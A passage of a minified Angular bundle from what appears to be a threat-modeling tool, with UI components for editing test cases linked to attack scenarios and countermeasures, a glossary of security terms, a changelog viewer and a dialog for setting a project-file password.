"),C(2),V("showTimestamp",!1)("hasCheckbox",!1)("enumerateItems",!0)("strings",e.testCase.Steps),C(1),ct("\n    ",re(75,66,"properties.TestData"),":\n    "),C(2),V("showTimestamp",!1)("hasCheckbox",!1)("strings",e.testCase.TestData),C(1),ct("\n    ",re(78,68,"properties.Summary"),":\n    "),C(2),V("showTimestamp",!0)("hasCheckbox",!1)("notes",e.testCase.Summary),C(1),ct("\n    ",re(81,70,"general.Images"),":\n    "),C(2),at("matTooltip",re(83,72,"general.Add")),C(10),V("ngForOf",e.testCase.Images),C(7),Ct("prop-list-light",!e.theme.IsDarkMode)("prop-list-dark",e.theme.IsDarkMode),C(2),V("ngForOf",e.linkLists),C(24),V("ngIf",e.selectedLinks)}}let gM=(()=>{class t{constructor(e,i,n,r,c,d,T){this.dataService=n,this.theme=r,this.dialog=c,this.router=d,this.activatedRoute=T,this.linkLists=[],this.selectedLinks=null,this.searchString="",this.groups={},e&&(this.testCase=e),i&&i.subscribe(k=>this.testCase=k)}get testCase(){return this._testCase}set testCase(e){this._testCase=e,this.selectedLinks=null,this.RefreshLinks()}get canAddAttackScenario(){return this.testCase.LinkedElements.length>0}ngOnInit(){this.RefreshLinks()}onKeyDown(e){"F2"==e.key&&(e.preventDefault(),this.nameBox&&this.nameBox.nativeElement.select())}RefreshLinks(e=null){this.linkLists=[],this.linkLists.push({Key:"properties.LinkedElements",Value:this.testCase.LinkedElements}),this.linkLists.push({Key:"properties.LinkedScenarios",Value:this.testCase.LinkedScenarios}),this.linkLists.push({Key:"properties.LinkedMeasures",Value:this.testCase.LinkedMeasures}),e&&(this.selectedLinks=this.linkLists.find(i=>i.Key===e)),this.groups={}}AddAttackScenario(){const e=this.testCase.LinkedElements[0],i=this.GetItemView(e),n=this.dataService.Project.CreateAttackScenario(i.ID,!1);n.SetMapping("",[],e,[e],null,null,null,null),n.IsGenerated=!1,n.Name=this.testCase.Name,n.Description=this.testCase.Description,this.dialog.OpenAttackScenarioDialog(n,!0).subscribe(r=>{r?(this.testCase.AddLinkedAttackScenario(n),this.RefreshLinks()):this.dataService.Project.DeleteAttackScenario(n)})}AddLink(e){"properties.LinkedElements"===this.selectedLinks.Key?this.testCase.AddLinkedElement(e):"properties.LinkedScenarios"===this.selectedLinks.Key?this.testCase.AddLinkedAttackScenario(e):"properties.LinkedMeasures"===this.selectedLinks.Key&&this.testCase.AddLinkedCountermeasure(e),this.RefreshLinks(this.selectedLinks.Key)}RemoveLink(e){"properties.LinkedElements"===this.selectedLinks.Key?this.testCase.RemoveLinkedElement(e.ID):"properties.LinkedScenarios"===this.selectedLinks.Key?this.testCase.RemoveLinkedAttackScenario(e.ID):"properties.LinkedMeasures"===this.selectedLinks.Key&&this.testCase.RemoveLinkedCountermeasure(e.ID),this.RefreshLinks(this.selectedLinks.Key)}OnItemClick(e){if(e instanceof Lp){const i={viewID:this.GetItemView(e).ID,elementID:e.ID};this.router.navigate([],{relativeTo:this.activatedRoute,queryParams:i,replaceUrl:!0})}else e instanceof Rc?this.dialog.OpenAttackScenarioDialog(e,!1):e instanceof Jl&&this.dialog.OpenCountermeasureDialog(e,!1,[])}OnFileSelected(e){return function(t,a,e,i){return new(e||(e=Promise))(function(r,c){function d(q){try{k(i.next(q))}catch(Y){c(Y)}}function T(q){try{k(i.throw(q))}catch(Y){c(Y)}}function k(q){q.done?r(q.value):function n(r){return r instanceof e?r:new e(function(c){c(r)})}(q.value).then(d,T)}k((i=i.apply(t,a||[])).next())})}(this,void 0,void 0,function*(){if(e.target.files&&e.target.files[0]){const i={maxSizeMB:1,maxWidthOrHeight:1920,useWebWorker:!0};try{const n=yield(0,FG.Z)(e.target.files[0],i),r=new FileReader;r.readAsDataURL(n),r.onload=c=>{this.testCase.Images=[...this.testCase.Images,c.target.result.toString()]}}catch(n){console.log(n)}}})}DeleteImage(e){const i=this.testCase.Images.indexOf(e);i>=0&&this.testCase.Images.splice(i,1)}ViewImage(e){this.dialog.OpenViewImageDialog(e)}GetItemView(e){return e instanceof Lp?this.testCase.GetViewOfLinkedElement(e):e instanceof Rc||e instanceof Jl?this.dataService.Project.GetView(e.ViewID):void 0}GetMenuGroups(e){if(null==this.groups[e.Key]){this.groups[e.Key]=[];const i=[];this.dataService.Project.GetDevices().forEach(n=>{i.push(n.HardwareDiagram),n.SoftwareStack&&i.push(n.SoftwareStack),n.ProcessStack&&i.push(n.ProcessStack)}),this.dataService.Project.GetMobileApps().forEach(n=>{n.SoftwareStack&&i.push(n.SoftwareStack),n.ProcessStack&&i.push(n.ProcessStack)}),i.push(...this.dataService.Project.GetDFDiagrams()),"properties.LinkedElements"===e.Key?i.forEach(n=>{let r;n instanceof as?r=n.Elements.GetChildrenFlat():n instanceof Om&&(r=n.GetChildrenFlat()),r&&(r=r.filter(c=>!this.testCase.LinkedElements.includes(c)),r.length>0&&this.groups[e.Key].push({Key:n,Value:r}))}):"properties.LinkedScenarios"===e.Key?i.forEach(n=>{const r=this.dataService.Project.GetAttackScenariosApplicable().filter(c=>c.ViewID==n.ID&&!this.testCase.LinkedScenarios.includes(c));(null==r?void 0:r.length)>0&&this.groups[e.Key].push({Key:n,Value:r})}):"properties.LinkedMeasures"===e.Key&&i.forEach(n=>{const r=this.dataService.Project.GetCountermeasuresApplicable().filter(c=>c.ViewID==n.ID&&!this.testCase.LinkedMeasures.includes(c));(null==r?void 0:r.length)>0&&this.groups[e.Key].push({Key:n,Value:r})})}return this.groups[e.Key]}GetTestCaseStates(){return $g.GetKeys()}GetTestCaseStateName(e){return $g.ToString(e)}GetFilteredList(e){return e.flatMap(i=>i.Value).filter(i=>i.Name.toLowerCase().includes(this.searchString.toLowerCase()))}OnSearchBoxClick(){var e,i,n;null===(n=null===(i=null===(e=this.searchBox)||void 0===e?void 0:e._elementRef)||void 0===i?void 0:i.nativeElement)||void 0===n||n.focus()}}return t.\u0275fac=function(e){return new(e||t)(Ee(Kg,8),Ee(Tt,8),Ee(Yi),Ee(Oa),Ee(Wn),Ee(Oo),Ee(El))},t.\u0275cmp=Wt({type:t,selectors:[["app-test-case"]],viewQuery:function(e,i){if(1&e&&(Mi(pPe,5),Mi(_Pe,5)),2&e){let n;Vt(n=Bt())&&(i.nameBox=n.first),Vt(n=Bt())&&(i.searchBox=n.first)}},hostBindings:function(e,i){1&e&&he("keydown",function(r){return i.onKeyDown(r)},0,Qc)},inputs:{testCase:"testCase"},decls:1,vars:1,consts:[[4,"ngIf"],["appearance","fill",2,"width","calc(100% - 85px)"],["matInput","","type","text","matTooltipShowDelay","1000",3,"spellcheck","ngModel","matTooltip","ngModelChange"],["nameBox",""],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["appearance","fill",2,"width","70px","float","right"],["matInput","","type","number","min","0","required","","matTooltipShowDelay","1000",3,"ngModel","matTooltip","ngModelChange"],["style","color: red;","class","alert alert-danger",4,"ngIf"],["appearance","fill",1,"property-form-field"],["matTooltipShowDelay","1000",3,"value","matTooltip","valueChange"],[3,"value",4,"ngFor","ngForOf"],["mat-icon-button","","matTooltipShowDelay","1000",2,"vertical-align","super",3,"disabled","matTooltip","click"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],[3,"showTimestamp","hasCheckbox","strings"],[3,"showTimestamp","hasCheckbox","enumerateItems","strings"],[3,"showTimestamp","hasCheckbox","notes"],["mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],["type","file","accept","image/*",1,"fileInput",3,"change"],["fileUpload",""],[2,"overflow","auto"],["class","imgContainer",4,"ngFor","ngForOf"],[1,"row"],[1,"column1"],[1,"prop-list"],[3,"highlight-light","highlight-dark","click",4,"ngFor","ngForOf"],["addMenu","matMenu"],["matMenuContent",""],["itemMenu","matMenu"],["filteredList","matMenu"],[1,"column2"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],[1,"alert","alert-danger",2,"color","red"],[3,"value"],[1,"imgContainer"],[3,"src","click"],["projImg",""],[1,"removeBtn"],["mat-icon-button","","color","primary",3,"click"],[3,"click"],["mat-list-icon",""],["mat-line",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto",3,"matMenuTriggerFor","matMenuTriggerData","matTooltip"],["mat-menu-item","",3,"ngModel","matMenuTriggerFor","matMenuTriggerData","placeholder","ngModelChange","click"],["searchBox",""],["mat-menu-item","",3,"matMenuTriggerFor","matMenuTriggerData",4,"ngFor","ngForOf"],["mat-menu-item","",3,"matMenuTriggerFor","matMenuTriggerData"],["mat-menu-item","",3,"click",4,"ngFor","ngForOf"],["mat-menu-item","",3,"click"],["mat-menu-item","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngFor","ngForOf"],["mat-menu-item","","matTooltipShowDelay","1000",3,"matTooltip","click"],[2,"margin-left","10px"],[4,"ngFor","ngForOf"],["matTooltipShowDelay","1000",1,"buttonAsText","primary-color",2,"font-size","small !important",3,"click"]],template:function(e,i){1&e&&ne(0,kPe,130,74,"div",0),2&e&&V("ngIf",i.testCase)},styles:['.primary-color[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%]     .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%]     .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.property-form-field[_ngcontent-%COMP%]{width:300px}.imgContainer[_ngcontent-%COMP%]{position:relative;float:left;margin-right:10px}.imgContainer[_ngcontent-%COMP%]   img[_ngcontent-%COMP%]{max-height:100px;height:auto}.imgContainer[_ngcontent-%COMP%]   .removeBtn[_ngcontent-%COMP%]{position:absolute;left:0;top:0}.imgContainer[_ngcontent-%COMP%]   .removeBtn[_ngcontent-%COMP%]   button[_ngcontent-%COMP%]{width:20px;height:20px}.fileInput[_ngcontent-%COMP%]{display:none}']}),t})(),PPe=(()=>{class t{constructor(e){e&&(this.image=e.Value)}ngOnInit(){}}return t.\u0275fac=function(e){return new(e||t)(Ee(E2,8))},t.\u0275cmp=Wt({type:t,selectors:[["app-image-view"]],inputs:{image:"image"},decls:1,vars:1,consts:[[2,"width","100%","height","100%",3,"src"]],template:function(e,i){1&e&&it(0,"img",0),2&e&&V("src",i.image,nm)}}),t})();const OPe=["termsImg"];function NPe(t,a){1&t&&(m(0,"span"),s(1," | "),u())}function LPe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n    "),m(2,"button",4),he("click",function(){const r=be(e).$implicit;return Me(B().ScrollTo(r))}),s(3),u(),s(4,"\n    "),ne(5,NPe,2,0,"span",5),s(6,"\n  "),Mt()}if(2&t){const e=a.$implicit,i=a.last,n=B();C(2),ri("color",n.theme.IsDarkMode?"white":"black"),Ct("primary-color",null!=n.glossary[e]),C(1),ke(e),C(2),V("ngIf",!i)}}function zPe(t,a){if(1&t&&(m(0,"p")(1,"strong"),s(2),u(),s(3),u()),2&t){const e=a.$implicit;C(2),ct("",e.name,":"),C(1),ct(" ",e.description,"")}}function WPe(t,a){if(1&t&&(m(0,"div"),s(1,"\n      "),m(2,"h3"),s(3),u(),s(4,"\n      "),ne(5,zPe,4,2,"p",2),s(6,"\n    "),u()),2&t){const e=B().$implicit,i=B();C(3),ke(e),C(2),V("ngForOf",i.glossary[e])}}function FPe(t,a){if(1&t&&(bt(0),s(1,"\n    "),ne(2,WPe,7,2,"div",5),s(3,"\n  "),Mt()),2&t){const e=a.$implicit,i=B();C(2),V("ngIf",i.glossary[e])}}const VPe=["Asset","AttackScenario","AttackVector","Countermeasure","IoT-Device","Mitigation","MitigationProcess","Risk","RiskAssessment","SystemThreat","Threat","ThreatAnalysis","ThreatModeling","ThreatSource","Vulnerability","Weakness"];let BPe=(()=>{class t{constructor(e,i,n){this.theme=e,this.dialog=i,this.translate=n,this.alphabet=[],this.glossary={},this.termsImageSrc="./assets/Terms_en.png"}ngOnInit(){for(let e=0;e<26;e++)this.alphabet.push(String.fromCharCode("A".charCodeAt(0)+e));VPe.forEach(e=>{const i={name:this.translate.instant("glossary."+e+".n"),description:this.translate.instant("glossary."+e+".d")};null==this.glossary[i.name[0]]&&(this.glossary[i.name[0]]=[]),this.glossary[i.name[0]].push(i)}),"de"===this.translate.currentLang&&(this.termsImageSrc=this.termsImageSrc.replace("_en","_de"))}ScrollTo(e){const n=Array.from(document.getElementsByTagName("h3")).find(r=>r.textContent==e);n&&n.scrollIntoView()}ViewImage(){this.dialog.OpenViewImageDialog(this.termsImage.nativeElement.src,"1200px")}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Wn),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-glossary"]],viewQuery:function(e,i){if(1&e&&Mi(OPe,5),2&e){let n;Vt(n=Bt())&&(i.termsImage=n.first)}},decls:12,vars:3,consts:[[2,"width","800px",3,"src","click"],["termsImg",""],[4,"ngFor","ngForOf"],[2,"overflow","auto","width","800px"],[1,"buttonAsText",3,"click"],[4,"ngIf"]],template:function(e,i){1&e&&(m(0,"img",0,1),he("click",function(){return i.ViewImage()}),u(),s(2,"\n"),m(3,"div"),s(4,"\n  "),ne(5,LPe,7,6,"ng-container",2),s(6,"\n"),u(),s(7,"\n"),m(8,"div",3),s(9,"\n  "),ne(10,FPe,4,1,"ng-container",2),s(11,"\n"),u()),2&e&&(V("src",i.termsImageSrc,nm),C(5),V("ngForOf",i.alphabet),C(5),V("ngForOf",i.alphabet))},dependencies:[Zi,Ri],styles:[".primary-color[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}"]}),t})();const hf_i="0.4.24";function HPe(t,a){if(1&t&&(m(0,"li"),s(1),u()),2&t){const e=a.$implicit;C(1),ke(e)}}function UPe(t,a){if(1&t&&(m(0,"div"),s(1,"\n    "),m(2,"h3"),s(3),u(),s(4,"\n    "),m(5,"ul"),s(6,"\n      "),ne(7,HPe,2,1,"li",4),s(8,"\n    "),u(),s(9,"\n  "),u()),2&t){const e=a.$implicit,i=B();ri("opacity",i.IsNewerVersion(e.Key)?.5:1),C(2),Ct("color-primary",e.Key==i.Version),C(1),ke(e.Key),C(4),V("ngForOf",e.Value)}}let qPe=(()=>{class t{constructor(e){this.http=e,this.Version=hf_i,this.Versions=[]}ngOnInit(){this.http.get("https://raw.githubusercontent.com/SecSimon/TTM/main/CHANGELOG.md",{responseType:"text"}).subscribe(e=>{try{let i=null;e.split("\n").forEach(n=>{n.startsWith("#")?(i=n.replace(/#/g,"").trim(),this.Versions.push({Key:i,Value:[]})):i&&n.startsWith("*")&&this.Versions[this.Versions.length-1].Value.push(n.replace("*","").trim())})}catch(i){}})}IsNewerVersion(e){const i=this.Version.replace("v","").split("."),n=e.replace("v","").split(".");if(i.length==n.length)for(let r=0;r<i.length;r++){if(Number(n[r])>Number(i[r]))return!0;if(Number(n[r])<Number(i[r]))break}return!1}}return t.\u0275fac=function(e){return new(e||t)(Ee(rp))},t.\u0275cmp=Wt({type:t,selectors:[["app-changelog-dialog"]],decls:14,vars:5,consts:[["mat-dialog-title",""],[3,"opacity",4,"ngFor","ngForOf"],["align","end"],["mat-button","","cdkFocusInitial","",3,"mat-dialog-close"],[4,"ngFor","ngForOf"]],template:function(e,i){1&e&&(m(0,"h2",0),s(1,"CHANGELOG"),u(),s(2,"\n"),m(3,"mat-dialog-content"),s(4,"\n  "),ne(5,UPe,10,6,"div",1),s(6,"\n"),u(),s(7,"\n"),m(8,"mat-dialog-actions",2),s(9,"\n  "),m(10,"button",3),s(11),oe(12,"translate"),u(),s(13,"\n"),u()),2&e&&(C(5),V("ngForOf",i.Versions),C(5),V("mat-dialog-close",!0),C(1),ke(re(12,3,"general.Close")))},dependencies:[Zi,da,vm,Am,Tm,Em,Xi]}),t})(),R5=(()=>{class t{constructor(e){this.dataService=e}ngOnInit(){this.Project=this.dataService.Project}}return t.\u0275fac=function(e){return new(e||t)(Ee(Yi))},t.\u0275cmp=Wt({type:t,selectors:[["app-model-tasks"]],decls:22,vars:16,consts:[["matInput",""],[2,"margin-top","0px"],[3,"showTimestamp","hasCheckbox","canToggleTimestamp","notes"],[3,"showTimestamp","hasCheckbox","canToggleCheckbox","notes"]],template:function(e,i){1&e&&(m(0,"mat-form-field"),s(1,"\n  "),it(2,"input",0),s(3,"\n"),u(),s(4,"\n"),m(5,"div"),s(6,"\n  "),m(7,"h4",1),s(8),oe(9,"translate"),u(),s(10,"\n  "),it(11,"app-notes",2),s(12,"\n"),u(),s(13,"\n"),m(14,"div"),s(15,"\n  "),m(16,"h4"),s(17),oe(18,"translate"),u(),s(19,"\n  "),it(20,"app-notes",3),s(21,"\n"),u()),2&e&&(Ct("cdk-visually-hidden",!0),C(8),ke(re(9,12,"general.Tasks")),C(3),V("showTimestamp",!1)("hasCheckbox",!0)("canToggleTimestamp",!0)("notes",i.Project.Tasks),C(6),ke(re(18,14,"general.Notes")),C(3),V("showTimestamp",!0)("hasCheckbox",!1)("canToggleCheckbox",!0)("notes",i.Project.Notes))}}),t})();function GPe(t,a){1&t&&(bt(0),s(1,"\n    "),m(2,"p"),s(3),oe(4,"translate"),u(),s(5,"\n  "),Mt()),2&t&&(C(3),ke(re(4,1,"dialog.modelchanges.noChanges")))}function jPe(t,a){if(1&t&&(m(0,"li"),s(1),u()),2&t){const e=a.$implicit;C(1),ke(e)}}function QPe(t,a){if(1&t&&(bt(0),s(1,"\n    "),m(2,"p"),s(3),oe(4,"translate"),u(),s(5,"\n    "),m(6,"ul"),s(7,"\n      "),ne(8,jPe,2,1,"li",1),s(9,"\n    "),u(),s(10,"\n  "),Mt()),2&t){const e=B(2);C(3),ct("",re(4,2,"dialog.modelchanges.incompleteList"),":"),C(5),V("ngForOf",e.Changes)}}function $Pe(t,a){if(1&t&&(m(0,"div"),s(1,"\n  "),ne(2,GPe,6,3,"ng-container",0),s(3,"\n  "),ne(4,QPe,11,4,"ng-container",0),s(5,"\n"),u()),2&t){const e=B();C(2),V("ngIf",!e.dataService.Project.FileChanged),C(2),V("ngIf",e.dataService.Project.FileChanged)}}let qG=(()=>{class t{constructor(e,i){this.dataService=e,this.translate=i,this.Changes=[]}ngOnInit(){this.UpdateChanges()}UpdateChanges(){this.Changes=[],this.dataService.Project&&this.dataService.Project.GetLog().forEach(e=>{let i=e.Title;i.includes(".")||(i=this.translate.instant("general."+e.Title),i.includes("general.")&&(i=this.translate.instant("properties."+e.Title)),i.includes("properties.")&&(i=Gi.FromCamelCase(e.Title)));let n=Gi.Format(this.translate.instant("messages.changes."+e.Type.toString()),this.translate.instant(i));e.Name&&(n+=": "+e.Name),this.Changes.push(n)})}}return t.\u0275fac=function(e){return new(e||t)(Ee(Yi),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-model-changes"]],decls:1,vars:1,consts:[[4,"ngIf"],[4,"ngFor","ngForOf"]],template:function(e,i){1&e&&ne(0,$Pe,6,2,"div",0),2&e&&V("ngIf",i.dataService.Project)},dependencies:[Zi,Ri,Xi]}),t})();function KPe(t,a){1&t&&(bt(0),s(1),oe(2,"translate"),Mt()),2&t&&(C(1),ke(re(2,1,"status-bar.passwordProtectionOn")))}function XPe(t,a){1&t&&(bt(0),s(1),oe(2,"translate"),Mt()),2&t&&(C(1),ke(re(2,1,"status-bar.passwordProtectionOff")))}function YPe(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n    "),m(2,"mat-checkbox",7),he("ngModelChange",function(n){return be(e),Me(B().RemovePassword=n)}),s(3),oe(4,"translate"),u(),s(5,"\n    "),it(6,"br"),s(7,"\n    "),m(8,"mat-form-field",8),s(9,"\n      "),m(10,"mat-label"),s(11),oe(12,"translate"),u(),s(13,"\n      "),m(14,"input",9),he("ngModelChange",function(n){return be(e),Me(B().ChangePassword=n)}),u(),s(15,"\n      "),m(16,"mat-icon",10),he("click",function(){be(e);const n=B();return Me(n.ShowChangePassword=!n.ShowChangePassword)}),s(17),u(),s(18,"\n      "),m(19,"mat-icon",11),oe(20,"translate"),s(21,"privacy_tip"),u(),s(22,"\n    "),u(),s(23,"\n  "),u()}if(2&t){const e=B();C(2),V("ngModel",e.RemovePassword),C(1),ke(re(4,8,"dialog.save.removePW")),C(8),ke(re(12,10,"dialog.passswordprotection.NewPasword")),C(3),V("disabled",e.RemovePassword)("type",e.ShowChangePassword?"text":"password")("ngModel",e.ChangePassword),C(3),ke(e.ShowChangePassword?"visibility_off":"visibility"),C(2),at("matTooltip",re(20,12,"dialog.save.security"))}}function JPe(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n    "),m(2,"mat-form-field",8),s(3,"\n      "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n      "),m(8,"input",12),he("ngModelChange",function(n){return be(e),Me(B().NewPassword=n)}),u(),s(9,"\n      "),m(10,"mat-icon",10),he("click",function(){be(e);const n=B();return Me(n.ShowNewPassword=!n.ShowNewPassword)}),s(11),u(),s(12,"\n      "),m(13,"mat-icon",11),oe(14,"translate"),s(15,"privacy_tip"),u(),s(16,"\n    "),u(),s(17,"\n  "),u()}if(2&t){const e=B();C(5),ke(re(6,5,"dialog.save.addPW")),C(3),V("type",e.ShowNewPassword?"text":"password")("ngModel",e.NewPassword),C(3),ke(e.ShowNewPassword?"visibility_off":"visibility"),C(2),at("matTooltip",re(14,7,"dialog.save.security"))}}let ZPe=(()=>{class t{constructor(e,i,n){this.dialogRef=e,this.dataService=i,this.messageService=n}get HasChanges(){return this.IsEncrypted?this.RemovePassword||!Gi.NullOrEmpty(this.ChangePassword):!Gi.NullOrEmpty(this.NewPassword)}ngOnInit(){this.initalizeProperties()}Change(){this.IsEncrypted?this.RemovePassword?this.dataService.RemovePassword():this.dataService.SetPassword(this.ChangePassword):this.dataService.SetPassword(this.NewPassword),this.messageService.Info("messages.info.changesActiveAfterSaving"),this.initalizeProperties()}initalizeProperties(){this.IsEncrypted=this.dataService.SelectedFile.isEncrypted,this.RemovePassword=!1,this.NewPassword="",this.ShowNewPassword=!1,this.ChangePassword="",this.ShowChangePassword=!1}}return t.\u0275fac=function(e){return new(e||t)(Ee(Gh),Ee(Yi),Ee(A2))},t.\u0275cmp=Wt({type:t,selectors:[["app-password-protection-dialog"]],decls:31,vars:16,consts:[["mat-dialog-title",""],[2,"margin-bottom","15px"],[2,"vertical-align","bottom"],[4,"ngIf"],["align","end"],["mat-raised-button","","color","primary",3,"disabled","click"],["mat-button","","cdkFocusInitial","",3,"mat-dialog-close"],["color","primary",2,"padding-bottom","10px",3,"ngModel","ngModelChange"],[1,"field-width"],["matInput","",1,"field-width",3,"disabled","type","ngModel","ngModelChange"],["matSuffix","",3,"click"],["matSuffix","",3,"matTooltip"],["matInput","",1,"field-width",3,"type","ngModel","ngModelChange"]],template:function(e,i){1&e&&(m(0,"h2",0),s(1),oe(2,"translate"),u(),s(3,"\n"),m(4,"mat-dialog-content"),s(5,"\n  